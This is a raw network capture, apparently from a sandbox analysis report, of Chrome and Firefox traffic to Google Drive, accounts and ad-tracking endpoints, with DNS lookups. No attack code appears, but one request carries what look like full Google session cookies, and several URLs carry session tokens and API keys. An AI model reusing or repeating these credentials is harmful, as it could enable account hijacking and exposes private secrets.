GET /ddm/activity/src=2507573;type=googl003;cat=fl-gw008;ord=1;num=1640181783109;npa=0;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B123.0.6312.123%7CNot%253AA-Brand%3B8.0.0.0%7CChromium%3B123.0.6312.123;uamb=0;uam=;uap=Windows;uapv=14.0.0;uaw=0;pscdl=denied;frm=0;gtm=45fe5190v9181638614z8595350za201zb595350;gcs=G101;gcd=13q3r3l3l5l1;dma=0;tag_exp=101925629~102067555~102067808~102081485~102198178;epver=2;~oref=https%3A%2F%2Fworkspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F? HTTP/2.0
host: ade.googlesyndication.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://ade.googlesyndication.com/ddm/activity/src=2507573;dc_pre=CI3T9Iik84oDFXUiBgAdprIO1A;type=googl003;cat=fl-gw008;ord=1;num=1640181783109;npa=0;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B123.0.6312.123%7CNot%253AA-Brand%3B8.0.0.0%7CChromium%3B123.0.6312.123;uamb=0;uam=;uap=Windows;uapv=14.0.0;uaw=0;pscdl=denied;frm=0;gtm=45fe5190v9181638614z8595350za201zb595350;gcs=G101;gcd=13q3r3l3l5l1;dma=0;tag_exp=101925629~102067555~102067808~102081485~102198178;epver=2;~oref=https%3A%2F%2Fworkspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F?

chrome.exe

Remote address:

216.58.204.66:443

Request

GET /ddm/activity/src=2507573;dc_pre=CI3T9Iik84oDFXUiBgAdprIO1A;type=googl003;cat=fl-gw008;ord=1;num=1640181783109;npa=0;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B123.0.6312.123%7CNot%253AA-Brand%3B8.0.0.0%7CChromium%3B123.0.6312.123;uamb=0;uam=;uap=Windows;uapv=14.0.0;uaw=0;pscdl=denied;frm=0;gtm=45fe5190v9181638614z8595350za201zb595350;gcs=G101;gcd=13q3r3l3l5l1;dma=0;tag_exp=101925629~102067555~102067808~102081485~102198178;epver=2;~oref=https%3A%2F%2Fworkspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F? HTTP/2.0
host: ade.googlesyndication.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1973855854&timestamp=1736791377283

chrome.exe

Remote address:

142.250.178.14:443

Request

GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1973855854&timestamp=1736791377283 HTTP/2.0
host: accounts.youtube.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "123.0.6312.123"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "14.0.0"
sec-ch-ua-model: ""
sec-ch-ua-bitness: "64"
sec-ch-ua-wow64: ?0
sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
OPTIONS

https://play.google.com/log?format=json&hasfast=true&authuser=0

chrome.exe

Remote address:

142.250.179.238:443

Request

OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
origin: https://accounts.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
OPTIONS

https://play.google.com/log?format=json&hasfast=true&authuser=0

chrome.exe

Remote address:

142.250.179.238:443

Request

OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
origin: https://accounts.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
OPTIONS

https://play.google.com/log?format=json&hasfast=true&authuser=0

chrome.exe

Remote address:

142.250.179.238:443

Request

OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: authorization,x-goog-authuser
origin: https://drive.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://drive.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://accounts.youtube.com/accounts/SetSID?ssdc=1&sidt=ALWU2cs7dDP0k5dv7R8/Z%2BaSX7vPT0gHU9yxrJop3NaiA/5O/sguDsNANAtmmSu0CZefG8%2BReZ3xrImRnV5saegxdqMgBqhkn/ljf7QabKTYCk2c0DRfXbmPFqleaZd6xZ90D%2BZ4WMiTUVZMm9SzhEyDMhsD%2BnNWW1e5VTlZ6QvqNr1pGTiBPqonwtyS2qGDf8C2IUzPDxPvMLODK/2eSy6nGzH5n1dQ74R4ppLJI/LdSsJWlSfQaH9VbBNL2mlRXzWKGMHK2kNtUksl3k8WvMfAReSLSWV2B6DmuEZNo7ifpmrg3V/ao3Q0%2B3%2B26GeYfq8S9naupRe98pJgUSkH6DTpJuLQ1a5O2l8y2JHbhYZCbjxiAz3iDbE4kc4JuQqAWEPP3vdd/0xTWl/vO3obN0lK1bdbmuXjsmGCtx1gvh%2BOm77NKTeIxWP8bi2ZXdWN6qf39hFg7riuay7svjuYdnOFHmaFyUIzDQwf6auiFYNF%2B4Hi/p0%2BZPCNLhg90ej8xJohst7oRYY3kQ1yQEFecbLGDfXt8tZ35hK7/q16MFUZurougxAjpPIudOK2dSrauP/DijGmXNToMGIpwVwrO5trkqOGG0G6HlZ8IpFHM9Lcutk169Ztetr0ZfR1CRTk7CyayQH8LGlHhf8sN5CKLxrIbFoj7PX/jnw2wPNb90En59MZDYtR%2B11n1cPPF3HIDAJOB2kbzITkWnH9OJ97e3YkUt92898V3HAwC73zcFhC0tg%2B1ISBG4P1W34xucU2aCWReGIN6LT2&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto%26authuser%3D0&tcc=1&dbus=GB&ifkv=AVdkyDkNQHt5jt7m9AquP6nC9dKMQfX7bt7WfwnMjLSiu4Efi2FOQiuOeoLKB4ek04vhvhquhDSp

chrome.exe

Remote address:

142.250.178.14:443

Request

GET /accounts/SetSID?ssdc=1&sidt=ALWU2cs7dDP0k5dv7R8/Z%2BaSX7vPT0gHU9yxrJop3NaiA/5O/sguDsNANAtmmSu0CZefG8%2BReZ3xrImRnV5saegxdqMgBqhkn/ljf7QabKTYCk2c0DRfXbmPFqleaZd6xZ90D%2BZ4WMiTUVZMm9SzhEyDMhsD%2BnNWW1e5VTlZ6QvqNr1pGTiBPqonwtyS2qGDf8C2IUzPDxPvMLODK/2eSy6nGzH5n1dQ74R4ppLJI/LdSsJWlSfQaH9VbBNL2mlRXzWKGMHK2kNtUksl3k8WvMfAReSLSWV2B6DmuEZNo7ifpmrg3V/ao3Q0%2B3%2B26GeYfq8S9naupRe98pJgUSkH6DTpJuLQ1a5O2l8y2JHbhYZCbjxiAz3iDbE4kc4JuQqAWEPP3vdd/0xTWl/vO3obN0lK1bdbmuXjsmGCtx1gvh%2BOm77NKTeIxWP8bi2ZXdWN6qf39hFg7riuay7svjuYdnOFHmaFyUIzDQwf6auiFYNF%2B4Hi/p0%2BZPCNLhg90ej8xJohst7oRYY3kQ1yQEFecbLGDfXt8tZ35hK7/q16MFUZurougxAjpPIudOK2dSrauP/DijGmXNToMGIpwVwrO5trkqOGG0G6HlZ8IpFHM9Lcutk169Ztetr0ZfR1CRTk7CyayQH8LGlHhf8sN5CKLxrIbFoj7PX/jnw2wPNb90En59MZDYtR%2B11n1cPPF3HIDAJOB2kbzITkWnH9OJ97e3YkUt92898V3HAwC73zcFhC0tg%2B1ISBG4P1W34xucU2aCWReGIN6LT2&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto%26authuser%3D0&tcc=1&dbus=GB&ifkv=AVdkyDkNQHt5jt7m9AquP6nC9dKMQfX7bt7WfwnMjLSiu4Efi2FOQiuOeoLKB4ek04vhvhquhDSp HTTP/2.0
host: accounts.youtube.com
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform-version: "14.0.0"
sec-ch-ua-model: ""
sec-ch-ua-bitness: "64"
sec-ch-ua-wow64: ?0
sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://accounts.google.co.uk/accounts/SetSID?ssdc=1&sidt=ALWU2cvZPQ43gbjEgp8YVrorWh1otPuZJAUVYsME4eQ19w/AjYNetXPUp3RHap6xxu8vRLyfusYkVDJLSPaCp7TdqLt0N9nZADr0yD2/%2BsRUorzSyEYo3sd5unWFnklQzSmWZtQe8y5zBKK5SzyOSXetg3Gh1Xx55GKD4m6i4db87oBChwJLca%2BQUBHr2jqeiBJZJ%2BhKx%2BlaIoYSwoVqWhUdp%2BJS2NZLwmIstZC0IM0vrxeRJ783KbTNU9YFQ9TeZl6JWFijT9byj9L/GGt39CpCZxHlAWmwtIagO9ydboELc5jxgPyLINjEoNzDwYdYSWLdvluyma6MXE3bg4Jrp7QZr3j/qBV%2BOXEXZ7s1TDJJImH1Tif82jCjFm020lZRTMsZdc4%2BwkBxP/Lo6vyNXrfcecnHSMyz%2BtdtMYahCK4qiWhAoR2RVgfAX5TgtMo19g2Qnyq8RgVdNsmJwO13Ge5lytoOwbPvVZ7oEnaQC9M//MPIf6DvjS8ipIwFFZsaKiqoleYchSmdqf%2BJmpgiOwzv%2BcWw5sceWECM6kZ8sL0dcDVK%2Bw3AOgrDjCv1UDCmHEMijCBjDMnXRoJVnv9Xz9gi%2BFsB/nZO4tKF9GEUGQZnBuzCifqX3sIr309GCXofLfVoHkTyledX2NdbLQcASyhR5odjwoG/JFJfW6xrdZU9t20VRDiheXN1tmHmHKjJetV01yyNjoyKStn3M1lH%2BHSQwHFdWeKF4yHIT%2B%2BDekNTeumkFjAA3AdcM6ZT3ZSgQCPNNswP9cfE&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto%26authuser%3D0&tcc=1&ifkv=AVdkyDl6QEi-7GmqewIYykOVU29laUbFgCNje1lR-WSQdni8x_tdYZ4Ey87xvJABqG-wI9ILrZBH

chrome.exe

Remote address:

66.102.1.94:443

Request

GET /accounts/SetSID?ssdc=1&sidt=ALWU2cvZPQ43gbjEgp8YVrorWh1otPuZJAUVYsME4eQ19w/AjYNetXPUp3RHap6xxu8vRLyfusYkVDJLSPaCp7TdqLt0N9nZADr0yD2/%2BsRUorzSyEYo3sd5unWFnklQzSmWZtQe8y5zBKK5SzyOSXetg3Gh1Xx55GKD4m6i4db87oBChwJLca%2BQUBHr2jqeiBJZJ%2BhKx%2BlaIoYSwoVqWhUdp%2BJS2NZLwmIstZC0IM0vrxeRJ783KbTNU9YFQ9TeZl6JWFijT9byj9L/GGt39CpCZxHlAWmwtIagO9ydboELc5jxgPyLINjEoNzDwYdYSWLdvluyma6MXE3bg4Jrp7QZr3j/qBV%2BOXEXZ7s1TDJJImH1Tif82jCjFm020lZRTMsZdc4%2BwkBxP/Lo6vyNXrfcecnHSMyz%2BtdtMYahCK4qiWhAoR2RVgfAX5TgtMo19g2Qnyq8RgVdNsmJwO13Ge5lytoOwbPvVZ7oEnaQC9M//MPIf6DvjS8ipIwFFZsaKiqoleYchSmdqf%2BJmpgiOwzv%2BcWw5sceWECM6kZ8sL0dcDVK%2Bw3AOgrDjCv1UDCmHEMijCBjDMnXRoJVnv9Xz9gi%2BFsB/nZO4tKF9GEUGQZnBuzCifqX3sIr309GCXofLfVoHkTyledX2NdbLQcASyhR5odjwoG/JFJfW6xrdZU9t20VRDiheXN1tmHmHKjJetV01yyNjoyKStn3M1lH%2BHSQwHFdWeKF4yHIT%2B%2BDekNTeumkFjAA3AdcM6ZT3ZSgQCPNNswP9cfE&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto%26authuser%3D0&tcc=1&ifkv=AVdkyDl6QEi-7GmqewIYykOVU29laUbFgCNje1lR-WSQdni8x_tdYZ4Ey87xvJABqG-wI9ILrZBH HTTP/2.0
host: accounts.google.co.uk
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform-version: "14.0.0"
sec-ch-ua-model: ""
sec-ch-ua-bitness: "64"
sec-ch-ua-wow64: ?0
sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

lh3.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

lh3.google.com

IN A

Response

lh3.google.com

IN CNAME

lh2.l.google.com

lh2.l.google.com

IN A

216.58.212.238
DNS

lh3.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

lh3.google.com

IN A

Response

lh3.google.com

IN CNAME

lh2.l.google.com

lh2.l.google.com

IN A

216.58.212.238
GET

https://ssl.gstatic.com/images/branding/product/1x/drive_2020q4_48dp.png

chrome.exe

Remote address:

142.250.200.3:443

Request

GET /images/branding/product/1x/drive_2020q4_48dp.png HTTP/2.0
host: ssl.gstatic.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://drive.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://ssl.gstatic.com/docs/common/cleardot.gif?zx=r5jbjylw9np3

chrome.exe

Remote address:

142.250.200.3:443

Request

GET /docs/common/cleardot.gif?zx=r5jbjylw9np3 HTTP/2.0
host: ssl.gstatic.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://drive.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.google.com/u/0/ogw/AF2bZyj0W6ZVtN8KyX5zrkx3xUynQy35o_-yt2-kzNE_9KURxA=s32-c-mo

chrome.exe

Remote address:

216.58.212.238:443

Request

GET /u/0/ogw/AF2bZyj0W6ZVtN8KyX5zrkx3xUynQy35o_-yt2-kzNE_9KURxA=s32-c-mo HTTP/2.0
host: lh3.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://drive.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-3PSID=g.a000sQhvJAWmQ4mN-vmCBq4G_oBT3b0-klqHlCxVEnYdWCXs0soKjZzboFCsHoQqO6iUSQTb5QACgYKAc0SARQSFQHGX2MifVN2I4xFE0lp3BrkZ53u0hoVAUF8yKprMUakDM16Jcy0IiXUuTID0076
cookie: __Secure-1PSID=g.a000sQhvJAWmQ4mN-vmCBq4G_oBT3b0-klqHlCxVEnYdWCXs0soKpPdAR-6pXNGU8_8b3ghl4gACgYKAQcSARQSFQHGX2MiuzFwzoGVZjf9XiL_gv-yGBoVAUF8yKpXe45Ghwkqa8cshj6z4NA90076
cookie: SID=g.a000sQhvJAWmQ4mN-vmCBq4G_oBT3b0-klqHlCxVEnYdWCXs0soKh52HeyfeZmX7z4rNvRmNRgACgYKAQMSARQSFQHGX2MivN7-_rR5SYuFBuS5X1TOLxoVAUF8yKpmCLTsnkUgVLOwvkjiKMtj0076
cookie: HSID=AbQk1Uh8DGBGRT8zI
cookie: SSID=AQ4ySoJv7rKL3xBzT
cookie: APISID=LOPQUe7mvd0koWrH/AJWZLZntk8bZ1mG8T
cookie: SAPISID=QAcUORiRRhqwdnPG/AahU9sLt6XJSjxBMe
cookie: __Secure-1PAPISID=QAcUORiRRhqwdnPG/AahU9sLt6XJSjxBMe
cookie: __Secure-3PAPISID=QAcUORiRRhqwdnPG/AahU9sLt6XJSjxBMe
cookie: NID=520=UMTlyC0IQYjviE7RuSacYLbIFp4Tw6mmHTl1vwit0u772LgiP5oB5w7tNME2ir9q6M2D44za9DXaSRyXRvgJ9fzvFo-yn037_-_dHCiMnfZ7iTaNKxfNZm84gAnegQjeOdWXWbSk9kKL4xGjQDllYXuxR_g_PyOOxTMYhSK7h3C7atdIsCv1NRH_af-0oQ0StpEXSCLPa25hjEgI6veClFyDqviyKI3Emhj5oqpxn9RbO4QLkxUwbVNGEQEXjRMMyEJ09zb2jMGFsuDDpbP6k6-UDQN7-4jPqWdXQYeAK5s5rOdFii58IIizghRI0HTeRcBZ4SIPJMo9yEpwJdnLLSpT-cw30t2nOw3H04qp9YAHkYtn4o3ZxbidS6CiGTrG0ckDRBUT4NnZ7ZShhHKP-c7qmhVD70Z1iaHZN0FBmG2BOQoIIgfhjA7nNz9IUYhtQNsraTEjWo3BkE6ISHybgatM1jmHyM6gi98FQ3TjjxKdBF09fqoMxxcxNBcYcDrpE0NTYsIwFag7jyEWroTnCfjkJl7bF2qkuBN1d2Xwe8uVZyylyh-d5CCPwzig7_7VuiAlZbUTwMNdCI5vtomY_LJ1_nxu9vglmpbfeCYTDzyKJCrCUyLuwO900dFR330ewy-iJTgPnxnjfo_tZ2yVmO7rsPk9y6nKWvWsYEa6503WYD31RhjCvkEM9A
cookie: __Secure-ENID=25.SE=Xp-w7VNhDkuVPYBEZFe3duusIn6u5MHnTgUbjSHhQjwSeiKWre7UAUKxSe3out-CaH59KQDguk0FT0SYtiSPFtO3Cc_voMEoxkuzVl7chnXc_rTpmMtzNmr1Sav2rncoRJtBlYgcAxFa0NV3wwIcF5ATefsnmioozhwF9wRxzQ192VKHBYGSLuRbZfQuG3mOKDsUZ9EZOdLfNElFDw
cookie: SIDCC=AKEyXzXERZG3T8_33AICeVZiUlOUuaPSFj87aDjIbtNeOQmHfYLebDN2KddRP1HbQALmClu9gw
cookie: __Secure-1PSIDCC=AKEyXzUVZhvRketf2BXONPr5jUfQFeKreHNqFFhbgDxrZosXj0hHZkd8snWX0r-kRkVEloZb
cookie: __Secure-3PSIDCC=AKEyXzUp5Wp6Fj_QO7pUveBMQ6V-153ZVOBahw9CXMkMefuTnuoJ9YSMvGjF7ooHfawKFBNKxA
DNS

3.200.250.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

3.200.250.142.in-addr.arpa

IN PTR

Response

3.200.250.142.in-addr.arpa

IN PTR

lhr48s29-in-f31e100net
DNS

ogads-pa.clients6.google.com

NetworkService

Remote address:

8.8.8.8:53

Request

ogads-pa.clients6.google.com

IN A

Response

ogads-pa.clients6.google.com

IN A

216.58.201.106
DNS

106.201.58.216.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

106.201.58.216.in-addr.arpa

IN PTR

Response

106.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f101e100net

106.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f106�I

106.201.58.216.in-addr.arpa

IN PTR

lhr48s48-in-f10�I
DNS

106.201.58.216.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

106.201.58.216.in-addr.arpa

IN PTR

Response

106.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f1061e100net

106.201.58.216.in-addr.arpa

IN PTR

lhr48s48-in-f10�J

106.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f10�J
DNS

238.212.58.216.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

238.212.58.216.in-addr.arpa

IN PTR

Response

238.212.58.216.in-addr.arpa

IN PTR

lhr25s28-in-f141e100net

238.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f14�I

238.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f238�I
DNS

238.212.58.216.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

238.212.58.216.in-addr.arpa

IN PTR

Response

238.212.58.216.in-addr.arpa

IN PTR

lhr25s28-in-f141e100net

238.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f14�I

238.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f238�I
OPTIONS

https://clients6.google.com/drive/v2internal/apps?openDrive=true&reason=301&syncType=0&errorRecovery=false&fields=kind%2CdefaultAppIds%2Citems(kind%2Cid%2CuseByDefault%2Cname%2CopenUrlTemplate%2CprimaryMimeTypes%2CsecondaryMimeTypes%2CcreateUrl%2CcreateInFolderTemplate%2CobjectType%2CsupportsCreate%2CsupportsImport%2CsupportsMultiOpen%2CsupportsOfflineCreate%2Cinstalled%2Cauthorized%2CproductUrl%2CprimaryFileExtensions%2CsecondaryFileExtensions%2CshortDescription%2ClongDescription%2CproductId%2Cremovable%2Cicons(iconUrl%2Csize%2Ccategory)%2Ctype%2CchromeExtensionIds%2CrequiresAuthorizationBeforeOpenWith%2ChasDriveWideScope%2CdriveBranded%2CdriveSource%2CsupportsMobileBrowser%2CsupportsTeamDrives%2ChasGsmListing)&languageCode=en&retryCount=0&dsNonce=k0wcqv9rai0s&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

chrome.exe

Remote address:

142.250.187.238:443

Request

OPTIONS /drive/v2internal/apps?openDrive=true&reason=301&syncType=0&errorRecovery=false&fields=kind%2CdefaultAppIds%2Citems(kind%2Cid%2CuseByDefault%2Cname%2CopenUrlTemplate%2CprimaryMimeTypes%2CsecondaryMimeTypes%2CcreateUrl%2CcreateInFolderTemplate%2CobjectType%2CsupportsCreate%2CsupportsImport%2CsupportsMultiOpen%2CsupportsOfflineCreate%2Cinstalled%2Cauthorized%2CproductUrl%2CprimaryFileExtensions%2CsecondaryFileExtensions%2CshortDescription%2ClongDescription%2CproductId%2Cremovable%2Cicons(iconUrl%2Csize%2Ccategory)%2Ctype%2CchromeExtensionIds%2CrequiresAuthorizationBeforeOpenWith%2ChasDriveWideScope%2CdriveBranded%2CdriveSource%2CsupportsMobileBrowser%2CsupportsTeamDrives%2ChasGsmListing)&languageCode=en&retryCount=0&dsNonce=k0wcqv9rai0s&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8 HTTP/2.0
host: clients6.google.com
accept: */*
access-control-request-method: GET
access-control-request-headers: authorization,x-goog-authuser,x-goog-drive-client-version,x-goog-ext-525001598-jspb
origin: https://drive.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://drive.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
OPTIONS

https://clients6.google.com/drive/v2beta/apps?openDrive=true&reason=700&syncType=0&errorRecovery=false&fields=items(icons%5Bcategory%3D%27application%27%5D%2Cicons(size%2CiconUrl)%2Cid%2Cname%2CopenUrlTemplate%2CprimaryFileExtensions%2CprimaryMimeTypes%2CproductId%2CrankingInfo%2CsecondaryFileExtensions%2CsecondaryMimeTypes%2Ckind)%2Ckind&appQueryScope=all_webstore&languageCode=en&retryCount=0&key=AIzaSyBc1bLOZpOtg3-qgMjSQ6pmn6HbE2zjzJg

chrome.exe

Remote address:

142.250.187.238:443

Request

OPTIONS /drive/v2beta/apps?openDrive=true&reason=700&syncType=0&errorRecovery=false&fields=items(icons%5Bcategory%3D%27application%27%5D%2Cicons(size%2CiconUrl)%2Cid%2Cname%2CopenUrlTemplate%2CprimaryFileExtensions%2CprimaryMimeTypes%2CproductId%2CrankingInfo%2CsecondaryFileExtensions%2CsecondaryMimeTypes%2Ckind)%2Ckind&appQueryScope=all_webstore&languageCode=en&retryCount=0&key=AIzaSyBc1bLOZpOtg3-qgMjSQ6pmn6HbE2zjzJg HTTP/2.0
host: clients6.google.com
accept: */*
access-control-request-method: GET
access-control-request-headers: x-goog-drive-client-version
origin: https://drive.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://drive.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
OPTIONS

https://clients6.google.com/drive/v2internal/changes/startPageToken?openDrive=false&reason=1423&syncType=0&errorRecovery=false&dsNonce=ep5yu34wnxpd&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

chrome.exe

Remote address:

142.250.187.238:443

Request

OPTIONS /drive/v2internal/changes/startPageToken?openDrive=false&reason=1423&syncType=0&errorRecovery=false&dsNonce=ep5yu34wnxpd&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8 HTTP/2.0
host: clients6.google.com
accept: */*
access-control-request-method: GET
